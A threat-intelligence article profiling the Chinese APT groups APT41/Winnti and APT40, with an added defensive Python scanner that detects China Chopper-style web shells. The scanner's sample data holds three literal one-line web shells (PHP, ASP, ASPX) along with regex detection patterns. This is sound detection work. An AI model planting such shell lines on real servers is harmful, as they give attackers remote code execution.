16 February 2022

What is hiding behind the Great Firewall of China: The most prolific Chinese APTs (part 1)


Over the past two decades, the People’s Republic of China (PRC) has been steadily building its cyber power, eventually reaching the point where it is now considered one of the most prominent cyber players. Since the early 2000s, China has been competing with the United States and its allies for dominance of global cyberspace, a contest aggravated by the US's determination to sanction Chinese tech firms in response to the country’s malicious behavior in cyberspace.

China has more than once been accused of conducting “large-scale cyber operations abroad, aiming to acquire intellectual property, achieve political influence, carry out state-on-state espionage and position capabilities for disruptive effect in case of future conflict”. According to research by the London-based think tank International Institute for Strategic Studies (IISS), while China is considered a second-tier cyber power, due to its “growing industrial base in digital technology, it is the state best placed to join the US in the first tier.” However, IISS also pointed out that poor security and weak cyber-resilience policies for its critical national infrastructure undermine China’s strengths as a cyber power.

Once known for launching “smash and grab” operations seeking to simply steal large amounts of data from their victims as quickly as possible, China’s cyber threat groups have become more sophisticated over the years, constantly evolving their tactics, techniques, and procedures (TTPs).

China’s cyber-espionage operations have included compromising telecommunications firms, providers of managed services and broadly used software, defense contractors and other targets of interest.

China-linked threat actors have also conducted cyber operations in order to obtain information on members of Western governments, militaries and contractors, and have collected huge amounts of data on US citizens by breaching organizations such as the US Office of Personnel Management (OPM) and the Equifax credit bureau.

In February 2020, the US authorities charged four alleged members of China’s People’s Liberation Army with hacking into the computer systems of the credit reporting agency Equifax.

The following sections highlight some of the best-known advanced persistent threat (APT) groups associated with China, including their targets and their tactics, techniques, and procedures (TTPs).

APT41/Winnti

APT41 (aka Barium, Winnti, Wicked Panda, Wicked Spider, Axiom, Lead, BlackFly) is one of the most prolific state-sponsored groups linked to the Chinese government. Active since at least 2010, the threat actor is believed to be behind malicious campaigns aimed at a wide variety of sectors, including the healthcare, pharmaceutical, telecommunications, and video game industries across multiple countries, including the US, Japan, South Korea, India, Australia, and the UK.

The group is well known for a series of high-profile supply-chain attacks against the software industry, involving the distribution of tainted software in order to compromise more victims. Winnti has been linked by security researchers to several notable supply-chain attacks, including the CCleaner, NetSarang, and Asus Live Update compromises.

Winnti has an extensive arsenal of malware, including widely available tools such as Metasploit and Cobalt Strike, and custom-made malware, including the Winnti trojan, various droppers, loaders, and injectors, as well as Crosswalk, ShadowPad, FunnySwitch, PipeMon, and PlugX backdoors.

While APT41 mostly conducts espionage, the actor was also observed engaging in financially motivated activity for personal gain.

Given that Chinese threat actors typically tend to share malware tools among themselves, there is a significant lack of clarity within the cybersecurity community on precisely which groups are behind the attacks that have been lumped together under the Winnti umbrella.

APT41 has been linked by researchers to a large-scale campaign in early 2020 that affected a wide variety of industries across the world. In this campaign the threat actors leveraged several high-severity vulnerabilities in Cisco routers, Citrix infrastructure devices, and Zoho ManageEngine Desktop Central, an endpoint management tool, to break into internet-facing systems. In September 2020, the US Department of Justice unsealed three indictments that brought charges against five Chinese nationals and two Malaysians for network intrusions affecting over 100 victim organizations in multiple countries.

The Winnti group has also been observed using stolen digital certificates to sign malware, and exploiting remote access or internet facing services to gain initial access to victim networks.

APT40

APT40 (aka Gadolinium, Leviathan, TEMP.Periscope) is yet another APT group with alleged ties to the Chinese government. Active since 2013, this threat actor is primarily focused on nations and issues related to the South China Sea, a region which has long been a subject of territorial disputes between China and Brunei, Indonesia, Malaysia, the Philippines, Taiwan, and Vietnam.

APT40’s known targets include organizations in the engineering, shipbuilding, healthcare, government, maritime, and academic sectors within multiple countries bordering the South China Sea.

The group uses a variety of malicious software, including publicly available tools such as Cobalt Strike, as well as custom tools shared with other Chinese threat actors (the Airbreak, Freshair, and Beacon first-stage backdoors, Beacon being Cobalt Strike’s own payload; the China Chopper web shell; and the Photo and Badflick backdoors).

APT40 has been observed using a variety of techniques for initial compromise, including web server exploitation and phishing campaigns (with malicious attachments or Google Drive links) that deliver backdoors. The threat actor relies heavily on web shells for an initial foothold: a web shell planted on a compromised web server lets the operators maintain access to the environment, re-infect victim systems, and facilitate lateral movement.
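As an added example (not part of the original article and not any vendor's tooling), the following Python script scans a web root for the minimal "eval a request parameter" construct that the China Chopper server component and similar one-line web shells rely on. The PHP, ASP and ASPX signatures are assumed from the publicly documented Chopper variants; the file names, contents and directory layout of the sample web root are constructed for this demonstration.

```python
import re
import tempfile
from pathlib import Path

# Regexes for the minimal "eval a request parameter" construct used by the
# China Chopper server component and similar one-line web shells. The PHP, ASP
# and ASPX forms follow the publicly documented Chopper variants; the pattern
# names are labels chosen for this example.
SHELL_PATTERNS = {
    "php_eval_request": re.compile(
        r"@?\s*\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "asp_eval_request": re.compile(
        r"<%\s*eval\s*\(?\s*request\s*\(", re.I),
    "aspx_eval_request": re.compile(
        r"\beval\s*\(\s*Request\.(Item|Form|QueryString)\s*\[", re.I),
    # preg_replace with the /e modifier evaluates the replacement as PHP code
    "php_preg_replace_e": re.compile(
        r"preg_replace\s*\(\s*['\"]/.*?/[a-z]*e[a-z]*['\"]", re.I),
}

# Only server-side script types are worth scanning for this construct.
WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".ashx", ".jsp"}


def scan_text(text):
    """Return the names of all shell patterns that match the given source text."""
    return [name for name, pattern in SHELL_PATTERNS.items() if pattern.search(text)]


def scan_webroot(root):
    """Walk a web root and report (relative path, matched patterns, size in bytes)
    for every server-side script that looks like a one-line web shell."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        data = path.read_bytes()
        hits = scan_text(data.decode("utf-8", errors="replace"))
        if hits:
            findings.append((path.relative_to(root).as_posix(), hits, len(data)))
    return findings


# Constructed sample web root for the demonstration: two benign files and three
# planted shells in the PHP, ASP and ASPX forms (hypothetical names and paths).
SAMPLE_FILES = {
    "index.php": "<?php echo 'Hello'; ?>",
    "lib/helpers.php": "<?php function h($s) { return htmlspecialchars($s); } ?>",
    "uploads/cache.php": "<?php @eval($_POST['chopper']);?>",
    "admin/conn.asp": '<%eval request("pass")%>',
    "aspnet_client/x.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
}


def demo():
    """Materialise the sample web root in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            target = Path(tmp) / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body)
        return scan_webroot(tmp)


if __name__ == "__main__":
    for rel, hits, size in demo():
        print(f"{rel}: {', '.join(hits)} ({size} bytes)")
```

Treat hits as leads rather than verdicts: a legitimate application file can also evaluate request input, and a shell that is only slightly obfuscated will not match a regex. In practice the scan is paired with a file-integrity baseline of the web root, so that any new or modified script in a writable directory such as an upload folder is reviewed regardless of its contents.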

The group has been known to use exploits in its phishing campaigns, often taking advantage of software vulnerabilities within days of their disclosure. Observed vulnerabilities include CVE-2012-0158 (Microsoft Office), CVE-2017-0199 (Microsoft Office), CVE-2017-8759 (Microsoft .NET Framework), and CVE-2017-11882 (Microsoft Office).

